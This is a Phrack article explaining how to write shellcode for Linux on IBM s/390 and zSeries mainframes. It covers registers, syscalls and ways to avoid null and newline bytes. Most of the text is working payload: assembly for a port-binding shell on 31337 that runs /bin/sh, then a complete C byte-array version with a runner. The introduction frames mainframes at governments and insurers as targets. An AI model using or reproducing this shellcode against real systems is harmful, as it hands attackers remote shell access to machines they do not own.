Writing shellcode for Linux/390 mainframes. Includes port binding shellcode example.
c882054b5eac3179b12735dc7e7d8bd4b960f0cbc421c7afa516ca6eb6614193
==Phrack Inc.==
Volume 0x0b, Issue 0x3b, Phile #0x0d of 0x12
|=----------------=[ Linux/390 shellcode development ]=------------------=|
|=-----------------------------------------------------------------------=|
|=-------=[ johnny cyberpunk <jcyberpunk@thehackerschoice.com> ]=--------=|
--[ Contents
1 - Introduction
2 - History and facts
2.1 - Registers
2.2 - Instruction set
2.3 - Syscalls
2.4 - The native code
2.5 - Avoiding the evil 0x00 and 0x0a
2.6 - The final code
3 - References
--[ 1 - Introduction
Since Linux/390 has been released by IBM more and more b0xes of this
type can be found in the wild. A good reason for a hacker to get a closer
look on how vulnerable services can be exploited on a mainframe. Remember,
who are the owners of mainframes ? Yeah, big computer centres, insurances
or goverments. Well, in this article I'll uncover how to write the bad code
(aka shellcode). The bind-shellcode at the end should be taken as an
example. Other shellcode and exploit against some known vulnerabilities can
be found on a seperate link (see References) in the next few weeks.
Suggestions, improvements or flames can be send directly to the email
address posted in the header of this article. My gpg-key can be found at
the document bottom.
--[ 2 - History and facts
In late 1998 a small team of IBM developers from Boeblingen/Germany
started to port Linux to mainframes. One year later in December 1999 the
first version has been published for the IBM s/390. There are two versions
available:
A 32 bit version, referred to as Linux on s/390 and a 64 bit version,
referred to as Linux on zSeries. Supported distros are Suse, Redhat and
TurboLinux. Linux for s/390 is based on the kernel 2.2, the zSeries is
based on kernel 2.4. There are different ways to run Linux:
Native - Linux runs on the entire machine, with no other OS
LPAR - Logical PARtition): The hardware can be logically
partitioned, for example, one LPAR hosts a VM/VSE
environment and another LPAR hosts Linux.
VM/ESA Guest - means that a customer can also run Linux in a virtual
machine
The binaries are in ELF format (big endianess).
----[ 2.1 - Registers
For our shellcode development we really don't need the whole bunch of
registers the s/390 or zSeries has. The most interesting for us are the
registers %r0-%r15. Anyway I'll list some others here for to get an
overview.
General propose registers :
%r0-%r15 or gpr0-gpr15 are used for addressing and arithmetic
Control registers :
cr0-cr15 are only used by kernel for irq control, memory
management, debugging control ...
Access registers :
ar0-ar15 are normally not used by programs, but good for
temporary storage
Floating point registers :
fp0-fp15 are IEEE and HFP floating ( Linux only uses IEEE )
PSW ( Programm Status Word ) :
is the most important register and serves the roles of a program
counter, memory space designator and condition code register.
For those who wanna know more about this register, should take
a closer look on the references at the bottom.
----[ 2.2 - Instruction set
Next I'll show you some useful instructions we will need, while developing
our shellcode.
Instruction Example
---------------------------------------------------------------------------
basr (branch and save) %r1,0 # save value 0 to %r1
lhi (load h/word immediate) lhi %r4,2 # load value 2 into %r4
la (load address) la %r3,120(%r15) # load address from
# %r15+120 into %r3
lr (load register) lr %r4,%r9 # load value from %r9
# into %r4
stc (store character) stc %r6,120(%r15) # store 1 character from
# %r6 to %r15+120
sth (store halfword) sth %r3,122(%r15) # store 2 bytes from
# %r3 to %r15+122
ar (add) ar %r6,%r10 # add value in %r10 ->%r6
xr (exclusive or) xr %r2,%r2 # 0x00 trick :)
svc (service call) svc 1 # exit
----[ 2.3 - Syscalls
On Linux for s/390 or zSeries syscalls are done by using the
instruction SVC with it's opcode 0x0a ! This is no good message for
shellcoders, coz 0x0a is a special character in a lot of services. But
before i start explaining how we can avoid using this call let's have a
look on how our OS is using the syscalls.
The first four parameters of a syscall are delivered to the registers
%r2-%r5 and the resultcode can be found in %r2 after the SVC call.
Example of an execve call:
basr %r1,0
base:
la %r2,exec-base(%r1)
la %r3,arg-base(%r1)
la %r4,tonull-base(%r1)
svc 11
exec:
.string "/bin//sh"
arg:
.long exec
tonull:
.long 0x0
A special case is the SVC call 102 (SYS_SOCKET). First we have to feed
the register %r2 with the desired function ( socket, bind, listen, accept,
....) and %r3 points to a list of parameters this function needs. Every
parameter in this list has its own u_long value.
And again an example of a socket() call :
lhi %r2,2 # domain
lhi %r3,1 # type
xr %r4,%r4 # protocol
stm %r2,%r4,128(%r15) # store %r2 - %r4
lhi %r2,1 # function socket()
la %r3,128(%r15) # pointer to the API values
svc 102 # SOCKETCALL
lr %r7,%r2 # save filedescriptor to %r7
----[ 2.4 - The native code
So now, here is a sample of a complete portbindshell in native style :
.globl _start
_start:
basr %r1,0 # our base-address
base:
lhi %r2,2 # AF_INET
sth %r2,120(%r15)
lhi %r3,31337 # port
sth %r3,122(%r15)
xr %r4,%r4 # INADDR_ANY
st %r4,124(%r15) # 120-127 is struct sockaddr *
lhi %r3,1 # SOCK_STREAM
stm %r2,%r4,128(%r15) # store %r2-%r4, our API values
lhi %r2,1 # SOCKET_socket
la %r3,128(%r15) # pointer to the API values
svc 102 # SOCKETCALL
lr %r7,%r2 # save socket fd to %r7
la %r3,120(%r15) # pointer to struct sockaddr *
lhi %r9,16 # save value 16 to %r9
lr %r4,%r9 # sizeof address
stm %r2,%r4,128(%r15) # store %r2-%r4, our API values
lhi %r2,2 # SOCKET_bind
la %r3,128(%r15) # pointer to the API values
svc 102 # SOCKETCALL
lr %r2,%r7 # get saved socket fd
lhi %r3,1 # MAXNUMBER
stm %r2,%r3,128(%r15) # store %r2-%r3, our API values
lhi %r2,4 # SOCKET_listen
la %r3,128(%r15) # pointer to the API values
svc 102 # SOCKETCALL
lr %r2,%r7 # get saved socket fd
la %r3,120(%r15) # pointer to struct sockaddr *
stm %r2,%r3,128(%r15) # store %r2-%r3,our API values
st %r9,136(%r15) # %r9 = 16, this case: fromlen
lhi %r2,5 # SOCKET_accept
la %r3,128(%r15) # pointer to the API values
svc 102 # SOCKETCALL
xr %r3,%r3 # the following shit
svc 63 # duplicates stdin, stdout
ahi %r3,1 # stderr
svc 63 # DUP2
ahi %r3,1
svc 63
la %r2,exec-base(%r1) # point to /bin/sh
la %r3,arg-base(%r1) # points to address of /bin/sh
la %r4,tonull-base(%r1) # point to envp value
svc 11 # execve
slr %r2,%r2
svc 1 # exit
exec:
.string "/bin//sh"
arg:
.long exec
tonull:
.long 0x0
----[ 2.5 - Avoiding 0x00 and 0x0a
To get a clean working shellcode we have two things to bypass. First
avoiding 0x00 and second avoiding 0x0a.
Here is our first case :
a7 28 00 02 lhi %r2,02
And here is my solution :
a7 a8 fb b4 lhi %r10,-1100
a7 28 04 4e lhi %r2,1102
1a 2a ar %r2,%r10
I statically define a value -1100 in %r10 to use it multiple times.
After that i load my wanted value plus 1100 and in the next instruction
the subtraction of 1102-1100 gives me the real value. Quite easy.
To get around the next problem we have to use selfmodifing code:
svc:
.long 0x0b6607fe <---- will be svc 66, br %r14 after
code modification
Look at the first byte, it has the value 0x0b at the moment. The
following code changes this value to 0x0a:
basr %r1,0 # our base-address
la %r9,svc-base(%r1) # load address of svc subroutine
lhi %r6,1110 # selfmodifing
lhi %r10,-1100 # code is used
ar %r6,%r10 # 1110 - 1100 = \x0a opcode SVC
stc %r6,svc-base(%r1) # store svc opcode
Finally the modified code looks as follows :
0a 66 svc 66
07 fe br %r14
To branch to this subroutine we use the following command :
basr %r14,%r9 # branch to subroutine SVC 102
The Register %r9 has the address of the subroutine and %r14 contains
the address where to jump back.
----[ 2.6 - The final code
Finally we made it, our shellcode is ready for a first test:
.globl _start
_start:
basr %r1,0 # our base-address
base:
la %r9,svc-base(%r1) # load address of svc subroutine
lhi %r6,1110 # selfmodifing
lhi %r10,-1100 # code is used
ar %r6,%r10 # 1110 - 1100 = \x0a opcode SVC
stc %r6,svc-base(%r1) # store svc opcode
lhi %r2,1102 # portbind code always uses
ar %r2,%r10 # real value-1100 (here AF_INET)
sth %r2,120(%r15)
lhi %r3,31337 # port
sth %r3,122(%r15)
xr %r4,%r4 # INADDR_ANY
st %r4,124(%r15) # 120-127 is struct sockaddr *
lhi %r3,1101 # SOCK_STREAM
ar %r3,%r10
stm %r2,%r4,128(%r15) # store %r2-%r4, our API values
lhi %r2,1101 # SOCKET_socket
ar %r2,%r10
la %r3,128(%r15) # pointer to the API values
basr %r14,%r9 # branch to subroutine SVC 102
lr %r7,%r2 # save socket fd to %r7
la %r3,120(%r15) # pointer to struct sockaddr *
lhi %r8,1116
ar %r8,%r10 # value 16 is stored in %r8
lr %r4,%r8 # size of address
stm %r2,%r4,128(%r15) # store %r2-%r4, our API values
lhi %r2,1102 # SOCKET_bind
ar %r2,%r10
la %r3,128(%r15) # pointer to the API values
basr %r14,%r9 # branch to subroutine SVC 102
lr %r2,%r7 # get saved socket fd
lhi %r3,1101 # MAXNUMBER
ar %r3,%r10
stm %r2,%r3,128(%r15) # store %r2-%r3, our API values
lhi %r2,1104 # SOCKET_listen
ar %r2,%r10
la %r3,128(%r15) # pointer to the API values
basr %r14,%r9 # branch to subroutine SVC 102
lr %r2,%r7 # get saved socket fd
la %r3,120(%r15) # pointer to struct sockaddr *
stm %r2,%r3,128(%r15) # store %r2-%r3, our API values
st %r8,136(%r15) # %r8 = 16, in this case fromlen
lhi %r2,1105 # SOCKET_accept
ar %r2,%r10
la %r3,128(%r15) # pointer to the API values
basr %r14,%r9 # branch to subroutine SVC 102
lhi %r6,1163 # initiate SVC 63 = DUP2
ar %r6,%r10
stc %r6,svc+1-base(%r1) # modify subroutine to SVC 63
lhi %r3,1102 # the following shit
ar %r3,%r10 # duplicates
basr %r14,%r9 # stdin, stdout
ahi %r3,-1 # stderr
basr %r14,%r9 # SVC 63 = DUP2
ahi %r3,-1
basr %r14,%r9
lhi %r6,1111 # initiate SVC 11 = execve
ar %r6,%r10
stc %r6,svc+1-base(%r1) # modify subroutine to SVC 11
la %r2,exec-base(%r1) # point to /bin/sh
st %r2,exec+8-base(%r1) # save address to /bin/sh
la %r3,exec+8-base(%r1) # points to address of /bin/sh
xr %r4,%r4 # 0x00 is envp
stc %r4,exec+7-base(%r1) # fix last byte /bin/sh\\ to 0x00
st %r4,exec+12-base(%r1) # store 0x00 value for envp
la %r4,exec+12-base(%r1) # point to envp value
basr %r14,%r9 # branch to subroutine SVC 11
svc:
.long 0x0b6607fe # our subroutine SVC n + br %r14
exec:
.string "/bin/sh\\"
In a C-code environment it looks like this :
char shellcode[]=
"\x0d\x10" /* basr %r1,%r0 */
"\x41\x90\x10\xd4" /* la %r9,212(%r1) */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd4" /* stc %r6,212(%r1) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
"\xa7\x38\x7a\x69" /* lhi %r3,31337 */
"\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
"\x17\x44" /* xr %r4,%r4 */
"\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4d" /* lhi %r2,1101 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x72" /* lr %r7,%r2 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\xa7\x88\x04\x5c" /* lhi %r8,1116 */
"\x1a\x8a" /* ar %r8,%r10 */
"\x18\x48" /* lr %r4,%r8 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
"\xa7\x28\x04\x50" /* lhi %r2,1104 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
"\x50\x80\xf0\x88" /* st %r8,136(%r15) */
"\xa7\x28\x04\x51" /* lhi %r2,1105 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x8b" /* lhi %r6,1163 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
"\xa7\x38\x04\x4e" /* lhi %r3,1102 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
"\x41\x20\x10\xd8" /* la %r2,216(%r1) */
"\x50\x20\x10\xe0" /* st %r2,224(%r1) */
"\x41\x30\x10\xe0" /* la %r3,224(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xdf" /* stc %r4,223(%r1) */
"\x50\x40\x10\xe4" /* st %r4,228(%r1) */
"\x41\x40\x10\xe4" /* la %r4,228(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x66" /* svc 102 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
--[ 3 - References:
[1] z/Architecture Principles of Operation (SA22-7832-00)
https://publibz.boulder.ibm.com/epubs/pdf/dz9zr000.pdf
[2] Linux for S/390 ( SG24-4987-00 )
https://www.redbooks.ibm.com/pubs/pdfs/redbooks/sg244987.pdf
[3] LINUX for S/390 ELF Application Binary Interface Supplement
https://oss.software.ibm.com/linux390/docu/l390abi0.pdf
[4] Example exploits
https://www.thehackerschoice.com/misc/sploits/
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Weitere Infos: siehe https://www.gnupg.org
mQGiBDzw5yMRBACGJ1o25Bfbb6mBkP2+qwd0eCTvCmC5uJGdXWOW8BbQwDHkoO4h
sdouA+0JdlTFIQriCZhZWbspNsWEpXPOAW8vG3fSqIUqiDe6Aj21h+BnW0WEqx9t
8TkooEVS3SL34wiDCig3cQtmvAIj0C9g4pj5B/QwHJYrWNFoAxc2SW1lXwCg8Wk9
LawvHW+Xqnc6n/w5Oo8IpNsD/2Lp4fvQFiTvN22Jd63nCQ75A64fB7mH7ZUsVPYy
BctYXM4GhcHx7zfOhAbJQNWoNmYGiftVr9UvO9GSnG+Y9jq6I16qOn7T7dIZUEpL
F5FevEFTyrtDGYmBhGv9hwtbz3CI9n9gpZxz1xYTbDHxkVIiTMlcNR3GIJRPfo5B
a7u4A/9ncKqRx2HbRkaj39zugC6Y28z9lSimGzu7PTVw3bxDbObgi4CyHcjnHe+j
DResuKGgdyEf+d07ofbFEOdQjgaDx1mmswS4pcILKOyRdQMtdbgSdyPlJw5KGHLX
G0hrHV/Uhgok3W6nC43ZvPWbd3HVfOIU8jDTRgWaRDjGc45dtbQkam9obm55IGN5
YmVycHVuayA8am9obmN5YnBrQGdteC5uZXQ+iFcEExECABcFAjzw5yMFCwcKAwQD
FQMCAxYCAQIXgAAKCRD3c5EGutq/jMW7AJ9OSmrB+0vMgPfVOT4edV7C++RNHwCf
byT/qKeSawxasF8g4HeX33fSPe25Ag0EPPDnrRAIALdcTn8E2Z8Z4Ua4p8fjwXNO
iP6GOANUN5XLpmscv9v5ErPfK+NM2ARb7O7rQJfLkmKV8voPNj4lPUUyltGeOhzj
t86I5p68RRSvO5JKTW+riZamaD8lB84YqLzmt9OuzuOeAJCq3GuQtPMyrNuOkPL9
nX51EgnLnYaUYAkysAhYLhlrye/3maNdjtn2T63MoJauAoB4TpKvegsGsf1pA5mj
y9fuG6zGnWt8XpVSdD2W3PUJB+Q7J3On35byebIKiuGsti6Y5L0ZSDlW2rveZp9g
eRSQz06j+mxAooTUMBBJwMmXjHm5nTgr5OX/8mpb+I73MGhtssRr+JW+EWSLQN8A
AwcH/iqRCMmPB/yiMhFrEPUMNBsZOJ+VK3PnUNLbAPtHz7E2ZmEpTgdvLR3tjHTC
vZO6k40H1BkodmdFkCHEwzhWwe8P3a+wgW2LnPCM6tfPEfp9kPXD43UlTLWLL4RF
cPmyrs45B2uht7aE3Pe0SgbsnWAej87Stwb+ezOmngmrRvZKnYREVR1RHRRsH3l6
C4rexD3uHjFNdEXieW97xHG71YpOVDX6slCK2SumfxzQAEZC2n7/DqwPd6Z/abAf
Ay9WmTpqBFd2FApUtZ1h8cpS6MYb6A5R2BDJQl1hN2pQFNzIh8chjVdQc67dKiay
R/g0Epg0thiVAecaloCJlJE8b3OIRgQYEQIABgUCPPDnrQAKCRD3c5EGutq/jNuP
AJ979IDls926vsxlhRA5Y8G0hLyDAwCgo8eWQWI7Y+QVfwBG8XCzei4oAiI=
=2B7h
-----END PGP PUBLIC KEY BLOCK-----
|=[ EOF ]=---------------------------------------------------------------=|